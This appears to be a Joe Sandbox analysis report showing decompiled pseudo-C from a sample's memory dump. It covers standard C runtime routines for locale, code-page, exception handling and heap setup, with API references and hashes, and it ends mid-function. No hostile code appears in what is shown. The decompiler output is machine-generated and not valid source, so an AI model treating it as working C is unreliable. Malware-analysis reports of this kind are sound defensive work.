0x00000000
0x009193c0
0x009193de
0x009193e0
0x00919403
0x00000000
0x00919408
0x009193fb
0x00000000
0x00000000
0x009193fd
0x00000000
0x009193fd
0x009193c2
0x009193ca
0x00000000
0x00000000
0x009193cc
0x009193cf
0x009193d5
0x00000000
0x00000000
0x00000000
0x009193d7
0x009193d9
0x009193db
0x00000000
0x009193db
0x0091938c
0x00919394
0x00000000
0x00000000
0x00919396
0x00919399
0x0091939f
0x00000000
0x00000000
0x00000000
0x0091939f
0x009193a5
0x009193a7
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00919678,00000002,00000000,?,?,?,00919678,?,00000000), ref: 009193F3
GetLocaleInfoW.KERNEL32(?,20001004,00919678,00000002,00000000,?,?,?,00919678,?,00000000), ref: 0091941C
GetACP.KERNEL32(?,?,00919678,?,00000000), ref: 00919431

Strings

OCP, xrefs: 009193AE
ACP, xrefs: 00919378

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: adea9648740c3cbf8a0eec5ea5108a3cfc68efabe9346343c4118444de0e8194
Instruction ID: e91975ec5159f9b6abf812ba205c2d36623be2a856998bd231b7fb78b198d505
Opcode Fuzzy Hash: adea9648740c3cbf8a0eec5ea5108a3cfc68efabe9346343c4118444de0e8194
Instruction Fuzzy Hash: 5321B332704118AADB34DF65C920AE773ABAF54B60B568464E81AD71D4E732DEC3C350

Uniqueness

Uniqueness Score: -1.00%

Function 0091952F Relevance: 7.7, APIs: 5, Instructions: 183
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E0091952F(void* __ecx, void* __edx, void* __eflags, signed short _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				void* _t53;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t64;
				int _t66;
				short* _t70;
				intOrPtr _t73;
				void* _t75;
				short* _t76;
				intOrPtr _t83;
				short* _t86;
				short* _t89;
				short** _t99;
				short* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0x92c014; // 0xb29a853a
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E0090FBFC(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E0090FBFC(__ecx, __edx);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0x920bc4; // 0x17
					E009194CE(_t89, 0, 0x920ab0, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t97;
					if(__eflags == 0) {
						goto L19;
					}
					E00918E70(_t89, _t97, __eflags,  &_v20);
					_pop(_t89);
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0) {
						L8:
						E00918F56(_t89, _t97, __eflags,  &_v20);
						L9:
						_pop(_t89);
						if(_v20 != 0) {
							_t100 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t101 = E0091935A(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
							__eflags = _t101;
							if(_t101 == 0) {
								L22:
								_t53 = 0;
								L23:
								return E0090528B(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
							}
							_t55 = IsValidCodePage(_t101 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t101;
							}
							E0091047B(_v16,  &(_v24[0x128]), 0x55, _t100);
							__eflags = _t86;
							if(_t86 == 0) {
								L34:
								_t53 = 1;
								goto L23;
							}
							_t33 =  &(_t86[0x90]); // 0xd0
							E0091047B(_v16, _t33, 0x55, _t100);
							_t64 = GetLocaleInfoW(_v16, 0x1001, _t86, 0x40);
							__eflags = _t64;
							if(_t64 == 0) {
								goto L22;
							}
							_t36 =  &(_t86[0x40]); // 0x30
							_t66 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							_t38 =  &(_t86[0x80]); // 0xb0
							E0091B82E(_t38, _t101, _t38, 0x10, 0xa);
							goto L34;
						}
						_t73 =  *0x920aac; // 0x41
						_t75 = E009194CE(_t89, _t97, 0x9207a0, _t73 - 1, _v24);
						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0) {
							L14:
							E00918F56(_t89, _t97, __eflags,  &_v20);
							L15:
							_pop(_t89);
							goto L21;
						}
						_t118 =  *_t76;
						if( *_t76 == 0) {
							goto L14;
						}
						E00918EBB(_t89, _t97, _t118,  &_v20);
						goto L15;
					}
					_t114 =  *_t70 - _t97;
					if( *_t70 == _t97) {
						goto L8;
					}
					E00918EBB(_t89, _t97, _t114,  &_v20);
					goto L9;
				}
			}

0x00919537
0x0091953e
0x00919545
0x00919549
0x0091954d
0x0091955b
0x00919560
0x00919561
0x00919562
0x00919563
0x0091956b
0x0091956d
0x00919573
0x00919579
0x0091957c
0x0091957e
0x00919581
0x00919585
0x0091958c
0x00919599
0x0091959e
0x009195a1
0x009195a4
0x009195a4
0x009195a6
0x009195a9
0x009195ad
0x0091961d
0x0091961f
0x00919621
0x00919634
0x00919634
0x0091963b
0x00919641
0x00919644
0x00000000
0x00919644
0x00919623
0x00919626
0x00000000
0x00000000
0x0091962c
0x00919631
0x00000000
0x009195b4
0x009195b4
0x009195b8
0x009195ca
0x009195ce
0x009195d3
0x009195d7
0x009195d8
0x00919660
0x00919660
0x00919662
0x0091966e
0x00919678
0x0091967c
0x0091967e
0x0091964f
0x0091964f
0x00919651
0x0091965f
0x0091965f
0x00919684
0x0091968a
0x0091968c
0x00000000
0x00000000
0x00919693
0x00919699
0x0091969b
0x00000000
0x00000000
0x0091969d
0x009196a0
0x009196a2
0x009196a4
0x009196a4
0x009196b5
0x009196ba
0x009196bc
0x0091971c
0x0091971e
0x00000000
0x0091971e
0x009196c1
0x009196cb
0x009196db
0x009196e1
0x009196e3
0x00000000
0x00000000
0x009196eb
0x009196fa
0x00919700
0x00919702
0x00000000
0x00000000
0x0091970c
0x00919714
0x00000000
0x00919719
0x009195de
0x009195ed
0x009195f2
0x009195f7
0x00919647
0x00919647
0x00919647
0x00919649
0x0091964d
0x00000000
0x00000000
0x00000000
0x0091964d
0x009195f9
0x009195fb
0x009195ff
0x00919611
0x00919615
0x0091961a
0x0091961a
0x00000000
0x0091961a
0x00919601
0x00919604
0x00000000
0x00000000
0x0091960a
0x00000000
0x0091960a
0x009195ba
0x009195bd
0x00000000
0x00000000
0x009195c3
0x00000000
0x009195c3

APIs

Part of subcall function 0090FBFC: GetLastError.KERNEL32(?,00000000,?,0090BB24,00000000,00000000,?,?,009108B1,00000000,00000000,00000000,00000000,?), ref: 0090FC01
Part of subcall function 0090FBFC: SetLastError.KERNEL32(00000000,00000002,000000FF,?,009108B1,00000000,00000000,00000000,00000000,?), ref: 0090FC9F

Part of subcall function 0090FBFC: _free.LIBCMT ref: 0090FC5E
Part of subcall function 0090FBFC: _free.LIBCMT ref: 0090FC94

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0091963B
IsValidCodePage.KERNEL32(00000000), ref: 00919684
IsValidLocale.KERNEL32(?,00000001), ref: 00919693
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 009196DB
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 009196FA

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: d165509cedc37636b5431b57e83ccd2801476d05e30dcc007d182371d6cc1bfa
Instruction ID: 9ab41a0f2852a7be0b9ab9744cf53744c3cbff736edf9e9e72ee2e6bb8be47b4
Opcode Fuzzy Hash: d165509cedc37636b5431b57e83ccd2801476d05e30dcc007d182371d6cc1bfa
Instruction Fuzzy Hash: B5518B72B0020DAFDB21EFA5CC55BEE77BCBF88740F044469A915E7190EB709A80CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00918BCE Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E00918BCE(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t77;
				intOrPtr* _t84;
				short* _t86;
				void* _t88;
				intOrPtr* _t91;
				intOrPtr* _t95;
				short _t113;
				void* _t114;
				intOrPtr* _t116;
				intOrPtr _t119;
				signed int* _t120;
				void* _t121;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				void* _t128;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_t84 = _a4;
				_t33 = E0090FBFC(__ecx, __edx);
				_t113 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t123 + 4; // 0x54
				_t116 = _t6;
				_v8 = _t34;
				_t91 = _t84;
				_t35 = _t84 + 0x80;
				 *_t123 = _t84;
				 *_t116 = _t35;
				if( *_t35 != 0) {
					E00918B61(0x920ab0, 0x16, _t116);
					_t91 =  *_t123;
					_t131 = _t131 + 0xc;
					_t113 = 0;
				}
				_push(_t123);
				if( *_t91 == _t113) {
					E009184D2(_t84, _t91);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t116)) == _t113) {
						E009185F2();
					} else {
						E00918559(_t91);
					}
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t77 = E00918B61(0x9207a0, 0x40, _t123);
						_t131 = _t131 + 0xc;
						if(_t77 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t116)) == 0) {
								E009185F2();
							} else {
								E00918559(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t84 + 0x100;
					if( *_t84 != 0 ||  *_t38 != 0) {
						_t39 = E00918A1E(_t38, _t123);
					} else {
						_t39 = GetACP();
					}
					_t125 = _t39;
					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t95 = _v8;
							_t15 = _t119 + 0x120; // 0xd0
							_t86 = _t15;
							 *_t86 = 0;
							_t16 = _t95 + 2; // 0x6
							_t114 = _t16;
							do {
								_t45 =  *_t95;
								_t95 = _t95 + 2;
							} while (_t45 != _v12);
							_t18 = (_t95 - _t114 >> 1) + 1; // 0x3
							_t47 = E00915CF3(_t86, 0x55, _v8);
							_t132 = _t131 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E00909AAF();
								asm("int3");
								_t130 = _t132;
								_t50 =  *0x92c014; // 0xb29a853a
								_v52 = _t50 ^ _t132;
								_push(_t86);
								_push(_t125);
								_push(_t119);
								_t52 = E0090FBFC(_t97, _t114);
								_t87 = _t52;
								_t120 =  *(E0090FBFC(_t97, _t114) + 0x34c);
								_t127 = E00919309(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E00915A04(_t120, _t127,  *((intOrPtr*)(_t87 + 0x54)),  &_v272) == 0 && E0091943B(_t127) != 0) {
										 *_t120 =  *_t120 | 0x00000004;
										_t120[2] = _t127;
										_t120[1] = _t127;
									}
									_t62 =  !( *_t120 >> 2) & 0x00000001;
								} else {
									 *_t120 =  *_t120 & _t56;
									_t62 = _t56 + 1;
								}
								_pop(_t121);
								_pop(_t128);
								_pop(_t88);
								return E0090528B(_t62, _t88, _v32 ^ _t130, _t114, _t121, _t128);
							} else {
								if(E0091037D(_t86, 0x1001, _t119, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t119 + 0x80; // 0x30
									_t86 = _t20;
									_t21 = _t119 + 0x120; // 0xd0
									if(E0091037D(_t21, 0x1002, _t86, 0x40) == 0) {
										goto L37;
									} else {
										_t68 = E0091CA5B(_t86, 0x5f);
										_pop(_t97);
										if(_t68 != 0) {
											L31:
											_t22 = _t119 + 0x120; // 0xd0
											if(E0091037D(_t22, 7, _t86, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_t73 = E0091CA5B(_t86, 0x2e);
											_pop(_t97);
											if(_t73 == 0) {
												L32:
												_t119 = _t119 + 0x100;
												if(_t125 != 0xfde9) {
													E0091B82E(_t97, _t125, _t119, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t72 = E00915CF3(_t119, 0x10, L"utf8");
													_t132 = _t132 + 0x10;
													if(_t72 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x00918bd3
0x00918bd4
0x00918bd6
0x00918bdb
0x00918be2
0x00918be4
0x00918be7
0x00918be7
0x00918bea
0x00918bea
0x00918bf0
0x00918bf3
0x00918bf6
0x00918bf6
0x00918bf9
0x00918bfc
0x00918bfe
0x00918c04
0x00918c06
0x00918c0b
0x00918c15
0x00918c1a
0x00918c1c
0x00918c1f
0x00918c1f
0x00918c21
0x00918c25
0x00918c6e
0x00000000
0x00918c27
0x00918c2c
0x00918c35
0x00918c2e
0x00918c2e
0x00918c2e
0x00918c40
0x00918c4a
0x00918c4f
0x00918c54
0x00918c5a
0x00918c5e
0x00918c67
0x00918c60
0x00918c60
0x00918c60
0x00918c73
0x00918c73
0x00918c54
0x00918c40
0x00918c79
0x00918db5
0x00918db5
0x00000000
0x00918c7f
0x00918c7f
0x00918c88
0x00918c99
0x00918c8f
0x00918c8f
0x00918c8f
0x00918ca0
0x00918ca4
0x00000000
0x00918cc8
0x00918cc8
0x00918ccd
0x00918ccf
0x00918ccf
0x00918cd1
0x00918cd6
0x00918db0
0x00918db2
0x00918db7
0x00918dbb
0x00918cdc
0x00918cdc
0x00918cdf
0x00918cdf
0x00918ce7
0x00918cea
0x00918cea
0x00918ced
0x00918ced
0x00918cf0
0x00918cf3
0x00918cfd
0x00918d07
0x00918d0c
0x00918d11
0x00918dbc
0x00918dbe
0x00918dbf
0x00918dc0
0x00918dc1
0x00918dc2
0x00918dc3
0x00918dc8
0x00918dcc
0x00918dd4
0x00918ddb
0x00918dde
0x00918ddf
0x00918de3
0x00918de4
0x00918de9
0x00918df1
0x00918e00
0x00918e0c
0x00918e1d
0x00918e25
0x00918e3f
0x00918e4c
0x00918e4f
0x00918e52
0x00918e52
0x00918e5c
0x00918e27
0x00918e27
0x00918e29
0x00918e29
0x00918e62
0x00918e63
0x00918e66
0x00918e6d
0x00918d17
0x00918d27
0x00000000
0x00918d2d
0x00918d2f
0x00918d2f
0x00918d3b
0x00918d49
0x00000000
0x00918d4b
0x00918d4e
0x00918d54
0x00918d57
0x00918d67
0x00918d6c
0x00918d7a
0x00000000
0x00000000
0x00000000
0x00000000
0x00918d59
0x00918d5c
0x00918d62
0x00918d65
0x00918d7c
0x00918d7c
0x00918d88
0x00918da8
0x00000000
0x00918d8a
0x00918d8a
0x00918d94
0x00918d99
0x00918d9e
0x00000000
0x00918da0
0x00000000
0x00918da0
0x00918d9e
0x00000000
0x00000000
0x00000000
0x00918d65
0x00918d57
0x00918d49
0x00918d27
0x00918d11
0x00918cd6
0x00918ca4

APIs

Part of subcall function 0090FBFC: GetLastError.KERNEL32(?,00000000,?,0090BB24,00000000,00000000,?,?,009108B1,00000000,00000000,00000000,00000000,?), ref: 0090FC01
Part of subcall function 0090FBFC: SetLastError.KERNEL32(00000000,00000002,000000FF,?,009108B1,00000000,00000000,00000000,00000000,?), ref: 0090FC9F

GetACP.KERNEL32(?,?,?,?,?,?,0090D522,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00918C8F
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0090D522,?,?,?,00000055,?,-00000050,?,?), ref: 00918CBA
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00918E1D

Strings

utf8, xrefs: 00918D8C

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: c24156a286ced8af62197cee304c4bca65106769f1807af0e9cbdc355e71aa02
Instruction ID: 41d9182f78dd077f1a791b5f153e74e6319f50b48afee52376734292de7f790d
Opcode Fuzzy Hash: c24156a286ced8af62197cee304c4bca65106769f1807af0e9cbdc355e71aa02
Instruction Fuzzy Hash: 6871037570070EAADB24AB34DC46BEB73ACEF99700F144469F945DB1C1EE74E9C0A6A0

Uniqueness

Uniqueness Score: -1.00%

Function 0090579D Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0090579D(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00905961(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00906480(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00906480(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00905961(_t49);
				}
				return _t49;
			}

0x0090579d
0x0090579d
0x0090579d
0x009057b1
0x009057b3
0x009057b6
0x009057b6
0x009057ba
0x009057bf
0x009057d7
0x009057dd
0x009057e3
0x009057e9
0x009057ef
0x009057f5
0x009057fb
0x00905802
0x00905809
0x00905810
0x00905817
0x0090581e
0x00905825
0x00905826
0x0090582f
0x00905835
0x00905838
0x0090583e
0x0090584d
0x00905859
0x00905864
0x0090586b
0x00905872
0x0090587d
0x00905885
0x0090588e
0x00905890
0x00905893
0x00905895
0x0090589f
0x009058a7
0x009058ad
0x00000000
0x009058b4
0x009058b7

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 009057A9
IsDebuggerPresent.KERNEL32 ref: 00905875
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00905895
UnhandledExceptionFilter.KERNEL32(?), ref: 0090589F

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 88dd8473d2d0eafe11312e5be8d3b524ba7f08bc10571cabf0ba67d5787c602e
Instruction ID: 811a9c2c3279da77f2ad927cac732ae2fb930e574d5d53aa669d0bd84650d59c
Opcode Fuzzy Hash: 88dd8473d2d0eafe11312e5be8d3b524ba7f08bc10571cabf0ba67d5787c602e
Instruction Fuzzy Hash: 3D312B75D16218DFDB11DF64D989BCDBBB8AF08704F1040AAE40CA7290EB749A89DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00919791 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00919791() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x959fbc = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x00919791
0x00919799
0x009197a1

APIs

GetProcessHeap.KERNEL32 ref: 00919791

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 85b161189d23261a43845c6274d3fd59baf7ba0f77851f01a8ab4944414e4565
Instruction ID: ce878fc36b95e000b528a1e0dfbf14b7b42135c72375e81e1baa2516694e3681
Opcode Fuzzy Hash: 85b161189d23261a43845c6274d3fd59baf7ba0f77851f01a8ab4944414e4565
Instruction Fuzzy Hash: B0A0027061D201DB57448F375905259FA966645595705C0595406C5160D7244451AF01

Uniqueness

Uniqueness Score: -1.00%

Function 0090B61C Relevance: 22.9, APIs: 15, Instructions: 357
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0090B61C(void* __edx, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				intOrPtr _v72;
				signed int* _v76;
				signed int** _v80;
				signed int** _v84;
				void* _v88;
				char _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t126;
				signed int* _t129;
				intOrPtr* _t131;
				signed int* _t147;
				signed short _t150;
				signed int _t151;
				void* _t153;
				void* _t156;
				void* _t159;
				void* _t160;
				void* _t164;
				signed int _t165;
				signed int* _t166;
				signed char _t183;
				signed int* _t186;
				void* _t190;
				char _t195;
				signed char _t197;
				void* _t204;
				signed int* _t205;
				void* _t207;
				signed int* _t209;
				void* _t212;
				intOrPtr _t213;
				intOrPtr _t217;
				signed int* _t221;
				intOrPtr _t222;
				signed int _t223;
				void* _t227;
				signed int _t230;
				char* _t231;
				intOrPtr _t232;
				signed int* _t235;
				signed char* _t236;
				signed int** _t239;
				signed int** _t240;
				signed char* _t249;
				void* _t251;
				intOrPtr* _t252;
				void* _t255;
				signed int _t256;
				short* _t257;
				signed int _t260;
				signed int _t261;
				void* _t262;
				void* _t263;

				_t233 = __edx;
				_t126 =  *0x92c014; // 0xb29a853a
				_v8 = _t126 ^ _t261;
				_t252 = _a4;
				_t205 = 0;
				_v56 = _t252;
				_t237 = 0;
				_v32 = 0;
				_t213 =  *((intOrPtr*)(_t252 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v92 = _t252;
				_v88 = 0;
				if(_t213 == 0) {
					__eflags =  *(_t252 + 0x8c);
					if( *(_t252 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t252 + 0x8c) = _t205;
					_t129 = 0;
					__eflags = 0;
					 *(_t252 + 0x90) = _t205;
					 *_t252 = 0x91ede8;
					 *(_t252 + 0x94) = 0x91f068;
					 *(_t252 + 0x98) = 0x91f1e8;
					 *(_t252 + 4) = 1;
					L48:
					return E0090528B(_t129, _t205, _v8 ^ _t261, _t233, _t237, _t252);
				}
				_t131 = _t252 + 8;
				_v52 = 0;
				if( *_t131 != 0) {
					L3:
					_v52 = E00910679(1, 4);
					E0090F884(_t205);
					_v32 = E00910679(0x180, 2);
					E0090F884(_t205);
					_t237 = E00910679(0x180, 1);
					_v44 = _t237;
					E0090F884(_t205);
